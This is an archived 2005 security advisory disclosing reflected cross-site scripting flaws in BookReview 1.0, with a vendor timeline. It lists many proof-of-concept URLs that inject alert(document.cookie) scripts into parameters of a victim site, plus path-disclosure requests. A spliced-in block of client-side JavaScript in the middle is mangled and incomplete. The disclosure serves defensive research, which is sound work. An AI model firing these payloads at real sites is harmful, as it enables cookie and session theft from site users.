bookreviewXSS.txt

2005-08-14T00:00:00
ID PACKETSTORM:39327
Type packetstorm
Reporter Lostmon
Modified 2005-08-14T00:00:00

Description

                                        
                                            `###################################################  
BookReview 1.0 multiple variable XSS  
vendor url:http://www.readersunite.com  
advisory:http://lostmon.blogspot.com/2005/05/  
bookreview-10-multiple-variable-xss.html  
vendor notify: yes exploit available: yes  
###################################################  
  
BookReview contains a flaw that allows a remote cross  
site scripting attack. This flaw exists because the  
application does not validate multiple variables upon  
submission to multiple scripts. This could allow a user  
to create a specially crafted URL that would execute  
arbitrary code in a user's browser within the trust  
relationship between the browser and the server,  
leading to a loss of integrity.  
  
  
  
############  
versions:  
############  
  
BookReview beta 1.0 vulnerable.  
  
  
##############  
solution  
##############  
  
no solution was available at this time  
  
  
###########  
timeline  
###########  
  
discovered: 27 april 2005  
vendor notify 17 may 2005 (webform)  
disclosure: 26 may 2005  
  
  
  
##################  
proof of concepts  
###################  
all module files are requested through the 'index.php' script via the 'page' variable, like  
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]  
the name of the module can be 'add_review', 'add_contents' or others  
  
for example this url:  
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25  
  
is the same as this:  
  
http://[victim]/add_contents&isbn=083081423X&chapters=25  
  
so we have two ways to reach this flaw: one through index.php and the  
other directly through the module.  
  
##################  
add_review.htm  
#################  
  
http://[victim]/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true  
  
http://[victim]/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true  
  
http://[victim]/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true  
  
http://[victim]/add_review.htm?node=index&isbn=\\"><script>alert(document.cookie)</script>  
  
###################  
index.php  
###################  
  
http://[victim]/index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25  
  
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
NICE ERROR !!  
  
  
// NOTE(review): client-side script that apparently came back with the error
// shown above. The text is a mangled extraction, not runnable as shown: inside
// tallyup()'s for-loop ("for ( i=0; i") the remainder of tallyup() and the
// header of a second function are missing, and the body that follows belongs
// to that second function (it reads a parameter `value` and returns `roman`).
; function tallyup() { var count = 0; var book = 0; var part = 0; var  
section = 0; var chapter = 0; var appendix = 0; var main_prefix = "";  
var section_prefix = ""; for ( i=0; i var persian = '' + value; var  
roman=""; var ronumdashes=""; var buffer=10-persian.length; while  
(buffer>0) {persian="0"+persian;buffer--} var units=new  
Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new  
Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var  
hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM");  
var thousands=new  
Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var  
billionsdashes=new  
Array("","=","==","===","==","=","==","===","====","==");  
// `persian` is `value` as a string, left-padded with "0" to 10 characters;
// each table below is indexed by one digit character of it. `romandashes`
// is assigned without `var` (implicit global) and is never returned;
// `ronumdashes` is declared and never used.
romandashes=billionsdashes[persian.substring(0,1)]; var  
hundredmillionsdashes=new  
Array("","=","==","===","==","=","==","===","====","==");  
romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var  
tenmillionsdashes=new  
Array("","=","==","===","==","=","==","===","====","==");  
romandashes+=tenmillionsdashes[persian.substring(2,3)]; var  
millionsdashes=new  
Array("","_","__","___","_=","=","=_","=__","=___","_=");  
romandashes+=millionsdashes[persian.substring(3,4)]; var  
hundredthousandsdashes=new  
Array("","_","__","___","__","_","__","___","____","__");  
romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var  
tenthousandsdashes=new  
Array("","_","__","___","__","_","__","___","____","__");  
romandashes+=tenthousandsdashes[persian.substring(5,6)]; var  
thousandsdashes=new Array("","","",""," _","_","_","_","_"," _");  
romandashes+=thousandsdashes[persian.substring(6,7)];  
// The returned string: digits 0..8 of the padded value cycle through the
// thousands/hundreds/tens tables (the non-standard "MV","V","VM",... entries
// of `thousands` are what the author wrote), the last digit uses `units`.
roman=thousands[persian.substring(0,1)];  
roman+=hundreds[persian.substring(1,2)];  
roman+=tens[persian.substring(2,3)];  
roman+=thousands[persian.substring(3,4)];  
roman+=hundreds[persian.substring(4,5)];  
roman+=tens[persian.substring(5,6)];  
roman+=thousands[persian.substring(6,7)];  
roman+=hundreds[persian.substring(7,8)];  
roman+=tens[persian.substring(8,9)];  
roman+=units[persian.substring(9,10)]; return roman; } function  
alphabetise(number) { return String.fromCharCode(64+number); } /// alphabetise(number): the `function` keyword is at the end of the previous line; returns the character with UTF-16 code 64+number (1 -> "A", 26 -> "Z"), with no range check on number.
/**
 * Submit hook for the form: allows submission only when the element with
 * id 'agree' is checked. When it is not, an alert is shown and false is
 * returned so the submit is cancelled. Like the original, it throws if no
 * element with id 'agree' exists.
 * @returns {boolean} true when the agreement box is checked, false otherwise
 */
function submitconfirm() {
  var agreeBox = document.getElementById('agree');
  if (agreeBox.checked) {
    return true;
  }
  alert("You must indicate your agreement to the terms and conditions by checking the box provided.");
  return false;
}
  
  
###################  
add_contents.htm  
###################  
  
  
http://[victim]/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://[victim]/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://[victim]/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://[victim]/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
  
#########################  
others.  
#########################  
  
http://[victim]/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author  
  
http://[victim]/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels  
  
http://[victim]/suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()</SCRIPT>  
  
############################  
possible local file inclusion  
############################  
  
http://[victim]/suggestions/"><script>alert(document.cookie)</script>.htm  
http://[victim]/directory/">%3Cscript%3Ealert(document.cookie)%3C/script%3E.htm  
  
http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author  
  
  
  
################  
path disclosure:  
################  
  
http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit=Ok&submit%5Btype%5D=auth  
or  
  
http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit%5Btype%5D=title  
  
  
######################## €nd ########################  
  
thnx to estrella for being my light  
Thnx to icaro he is my Shadow !!!  
thnx to all http://www.osvdb.org Team  
thnx to all who day after day support me !!!  
--   
atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Data Mangler of: http://www.osvdb.org  
--  
La curiosidad es lo que hace mover la mente  
`